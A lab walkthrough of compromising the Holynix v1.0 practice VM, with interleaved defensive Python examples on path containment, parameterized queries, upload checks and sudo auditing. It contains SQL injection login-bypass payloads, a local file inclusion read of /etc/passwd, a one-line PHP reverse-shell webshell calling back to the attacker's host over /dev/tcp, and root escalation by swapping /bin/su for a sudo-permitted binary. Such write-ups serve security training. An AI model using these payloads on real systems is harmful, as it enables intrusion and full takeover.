Holynix v1.0

Host discovery

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:32 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00025s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.134
Host is up (0.00063s latency).
MAC Address: 00:0C:29:BC:05:DE (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.98 seconds

Port scan

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.134 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:32 EDT
Nmap scan report for 10.10.10.134
Host is up (0.0025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.39 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p80 10.10.10.134 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:33 EDT
Nmap scan report for 10.10.10.134
Host is up (0.00095s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|specialized|WAP|phone|switch
Running (JUST GUESSING): Linux 2.6.X|4.X (96%), Linksys embedded (89%), Kronos embedded (89%), ipTIME embedded (88%), Suga embedded (88%), Nokia embedded (87%), Google Android 4.0.X (87%), Extreme Networks ExtremeXOS 15.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:4.4 cpe:/h:linksys:rv042 cpe:/h:iptime:pro_54g cpe:/o:linux:linux_kernel:2.6.28 cpe:/h:nokia:n900 cpe:/o:google:android:4.0.4 cpe:/o:extremenetworks:extremexos:15.3
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (96%), Linux 2.6.35 (92%), Linux 2.6.22 (SPARC) (91%), Linux 2.6.18 - 2.6.24 (90%), Linux 2.6.9 - 2.6.33 (89%), Linux 4.4 (89%), Linksys RV042 router (89%), Kronos InTouch timeclock (89%), Linux 2.6.18 - 2.6.32 (88%), ipTIME PRO 54G WAP (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.90 seconds

UDP

└─$ sudo nmap -sU -p80 10.10.10.134 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:33 EDT
Nmap scan report for 10.10.10.134
Host is up (0.00034s latency).

PORT   STATE  SERVICE
80/udp closed http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Nmap vulnerability scan

└─$ sudo nmap --script=vuln -p80 10.10.10.134 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 10:00 EDT

PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.134
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.134:80/?page=login.php
|     Form id:
|     Form action: /index.php?page=login.php
|
|     Path: http://10.10.10.134:80/index.php?page=login.php
|     Form id:
|_    Form action: /index.php?page=login.php
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/index.php?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/index.php?page=login.php%27%20OR%20sqlspider
|_    http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /login.php: Possible admin folder
|   /login/: Login page
|   /home/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting folder
|   /index/: Potentially interesting folder
|   /misc/: Potentially interesting folder
|   /transfer/: Potentially interesting folder
|_  /upload/: Potentially interesting folder
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 345.50 seconds

Approach

Web exploitation

Directory brute-forcing

└─$ sudo gobuster dir -u http://10.10.10.134 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.134
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 09:35:12 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 351] [--> http://10.10.10.134/misc/]
/img                  (Status: 301) [Size: 350] [--> http://10.10.10.134/img/]
/upload               (Status: 301) [Size: 353] [--> http://10.10.10.134/upload/]
/login                (Status: 200) [Size: 342]
/home                 (Status: 200) [Size: 109]
/index                (Status: 200) [Size: 776]
/header               (Status: 200) [Size: 604]
/footer               (Status: 200) [Size: 63]
/transfer             (Status: 200) [Size: 44]
/messageboard         (Status: 200) [Size: 249]
/server-status        (Status: 403) [Size: 333]
/calender             (Status: 200) [Size: 247]
/ssp                  (Status: 301) [Size: 350] [--> http://10.10.10.134/ssp/]
/index                (Status: 200) [Size: 776]
===============================================================
2023/07/24 09:35:24 Finished
===============================================================

Manually test the login form for SQL injection by logging in with the universal password ' or 1=1--

The login succeeds. Behind it is a file inclusion vulnerability; the vulnerable parameter is text_file_name, as shown in this request:

POST /index.php?page=ssp.php HTTP/1.1
Host: 10.10.10.134
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.134
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.134/index.php?page=ssp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uid=1
Connection: close
text_file_name=%2Fetc%2Fpasswd&B=Display+File

The passwd file contents returned are as follows:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash

Attempting to include the shadow file fails.
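The text_file_name handler above opens whatever path it is given, which is why /etc/passwd comes back. As an added example (not the Holynix application's code), this is the containment check such a file viewer needs: the requested name is resolved beneath a fixed base directory and anything that escapes it is refused. The base path /var/www/ssp/files and the function names are assumptions for the example.

```python
import os
from typing import Optional

# Directory the "Display File" feature is meant to serve from. This path is an
# assumption for the example; the real Holynix base directory is not shown.
ALLOWED_BASE = "/var/www/ssp/files"


def resolve_within(base: str, user_path: str) -> Optional[str]:
    """Resolve user_path beneath base and return the absolute path only if it
    stays inside base. Absolute inputs, '..' traversal and anything that
    resolves outside base (including via a symlink) yield None."""
    base_real = os.path.realpath(base)
    if os.path.isabs(user_path):
        # "/etc/passwd"-style requests are never valid for a per-app file viewer
        return None
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if candidate == base_real:
        return None  # empty or "." input: the base itself is not a file
    # commonpath, not startswith: "/var/www/ssp/files_private" must not pass
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def display_file(user_path: str, base: str = ALLOWED_BASE) -> str:
    """Server-side equivalent of the text_file_name handler with the check
    applied. Returns the file contents, or one fixed error string that reveals
    nothing about paths outside the base directory."""
    path = resolve_within(base, user_path)
    if path is None:
        return "error: file not available"
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return "error: file not available"
```

Both realpath calls matter: comparing the raw joined string would let a symlink inside the base point anywhere, and a prefix test instead of commonpath would accept a sibling directory whose name merely starts with the base.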

The path /index.php?page=upload.php allows file uploads.

Try uploading a one-line webshell, shell.php:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>

The upload fails with a message saying that this user is not allowed to upload to the home directory.

Use the SQL injection to log in as rtmorris instead.

The error message reveals the original SQL query:

SELECT * FROM accounts WHERE username='' AND password=''

The modified payload:

' or username='rtmorris' -- 

The resulting query:

SELECT * FROM accounts WHERE username='tester' AND password='' or username='rtmorris' -- '
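The query shape the error message leaked is what makes the payload work: the password value is pasted into the SQL string, so a quote ends the string and the trailing comment discards the rest. As an added example (not Holynix's code), this reproduces that query against a constructed in-memory SQLite table and shows the same lookup with bound parameters, where the identical input is compared only as data. The table contents and the function names are assumptions for the example.

```python
import sqlite3
from typing import Optional

# Constructed sample accounts; not the contents of the Holynix database.
# A real application would store and compare password hashes, which is a
# separate issue from the query construction shown here.
SCHEMA = """
CREATE TABLE accounts (username TEXT, password TEXT);
INSERT INTO accounts VALUES ('tester', 'hunter2'), ('rtmorris', 's3cret');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_concatenated(conn, username: str, password: str) -> Optional[str]:
    """The shape of the query the error message exposed: user input pasted
    straight into the SQL string, so quotes in the input change the logic.
    AND binds tighter than OR, so a trailing "or username='x'" wins."""
    sql = (
        "SELECT username FROM accounts WHERE username='"
        + username + "' AND password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str) -> Optional[str]:
    """Same lookup with bound parameters: the driver never interprets the
    input as SQL, so the payload simply fails to match any password."""
    sql = "SELECT username FROM accounts WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None
```

Run with the walkthrough's payload as the password and "tester" as the username: the concatenated version returns rtmorris, the parameterized version returns nothing.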

Re-upload shell.php: this time the upload succeeds, but it is unclear where the file went, and the page path changes to

http://10.10.10.134/index.php?page=transfer.php

Use the file inclusion found earlier to read the contents of transfer.php:

<?php
if ( $auth == 0 ) {
    echo "<center><h2>Content Restricted</h2></center>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {   $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
        } else {
            if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
                if ( $command == 1 )
                {
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
            } else {
                echo "Sorry, there was a problem uploading your file.<br />";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
            }
        }
    } else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>
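transfer.php trusts the client-supplied MIME type, never sets $ok to 0, builds shell commands from the raw upload name, and extracts user archives as root with sudo tar. As an added example (not the Holynix code, and written in Python rather than PHP), this is the validation a hardened handler would do before touching the file: accept only a plain file name, check the gzip magic bytes instead of the declared type, and refuse archive members that would escape the destination. The function names and the constructed archives are assumptions for the example; extraction and storage are represented by the returned status strings.

```python
import io
import os
import re
import tarfile
from typing import List, Optional, Tuple

# Plain file names only: no directory parts, no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def safe_filename(name: str) -> Optional[str]:
    """Strip any directory component and accept only a conservative name."""
    base = os.path.basename(name)
    if base in ("", ".", "..") or base.startswith("."):
        return None
    return base if SAFE_NAME.match(base) else None


def looks_like_gzip(data: bytes) -> bool:
    """Check the gzip magic bytes instead of trusting $_FILES[...]['type']."""
    return data[:2] == b"\x1f\x8b"


def unsafe_members(data: bytes) -> List[str]:
    """Members a careful extractor must refuse: absolute paths, '..' components,
    and links, any of which could land outside the target home directory."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tf:
        for m in tf.getmembers():
            parts = m.name.split("/")
            if m.name.startswith("/") or ".." in parts or m.issym() or m.islnk():
                bad.append(m.name)
    return bad


def handle_upload(filename: str, data: bytes, autoextract: bool, home_dir: str) -> str:
    """Decide what to do with an upload. Real extraction would run as the web
    user (never via sudo) and only after these checks pass."""
    name = safe_filename(filename)
    if name is None:
        return "rejected: bad filename"
    if autoextract:
        if not looks_like_gzip(data):
            return "rejected: not a gzip archive"
        bad = unsafe_members(data)
        if bad:
            return "rejected: unsafe archive members " + ", ".join(bad)
        return "ok: extract " + name + " into " + home_dir
    return "ok: store " + os.path.join(home_dir, name)


def build_tgz(entries: List[Tuple[str, bytes]]) -> bytes:
    """Constructed sample archive builder used to exercise the checks."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in entries:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()
```

The original's exec() calls are the other half of the problem: even with a sanitized name, a command assembled from strings should be replaced by a subprocess invocation with an argument list (or, as here, by library code that never spawns a shell at all).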

So uploads land in the user's home directory, which is served as ~username. Next, pack the file with tar:

tar czf shell.php.gz shell.php

Upload shell.php.gz, then request it and catch the reverse shell:

curl http://10.10.10.134/~rtmorris/shell.php
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.134] 60802
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 11:07:27 up  1:35,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')";
www-data@holynix:/$ whoami
whoami
www-data
www-data@holynix:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

www-data@holynix:/$ uname -a
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
www-data@holynix:/$

www-data@holynix:/$ sudo -l
sudo -l
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
www-data@holynix:/$
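Four NOPASSWD rules as root for commands that move, re-own or unpack files are what the rest of this walkthrough turns into root. As an added example (not part of the original post), this is a small audit that parses sudo -l output and flags such rules, run over the output shown above. The parser and the binary list are assumptions for the example; the list is deliberately limited to the four commands on this host, and a real audit would use a fuller one.

```python
import os
import re
from typing import Dict, List

# The sudo -l output shown above, embedded so the audit runs offline.
SUDO_L_OUTPUT = """\
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
"""

# Binaries that, when runnable as root without a password, let the caller move,
# replace or re-own arbitrary files. Limited here to the four on this host.
FILE_CONTROL_BINARIES = {"mv", "chown", "chgrp", "tar"}

# One rule line: "(runas) TAG: TAG: /path/to/command ..."
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")


def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    """Turn sudo -l output into one dict per rule; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd"),
        })
    return rules


def risky_rules(rules: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Rules that run a file-control binary as root with no password prompt."""
    return [
        r for r in rules
        if r["runas"] == "root"
        and r["nopasswd"]
        and os.path.basename(str(r["cmd"])) in FILE_CONTROL_BINARIES
    ]


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print("flag: " + str(r["cmd"]) + " as " + str(r["runas"]) + " without password")
```

The remediation is the usual one for rules like these: grant the web user a purpose-built wrapper with fixed arguments (or drop the sudo dependency entirely, as the upload handler never needed root), rather than an unrestricted file utility.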

Privilege escalation

Privilege escalation via sudo mv

www-data@holynix:/$ mv /bin/tar /bin/tar.old
mv /bin/tar /bin/tar.old
mv: cannot move `/bin/tar' to `/bin/tar.old': Permission denied
www-data@holynix:/$ sudo mv /bin/tar /bin/tar.old
sudo mv /bin/tar /bin/tar.old
www-data@holynix:/$ sudo mv /bin/su /bin/tar
sudo mv /bin/su /bin/tar
www-data@holynix:/$ sudo tar
sudo tar
root@holynix:/#

Privilege escalation succeeded.

root@holynix:/# whoami
whoami
root
root@holynix:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.134/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:febc:5de/64 scope link
       valid_lft forever preferred_lft forever
root@holynix:/# uname -a
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
root@holynix:/#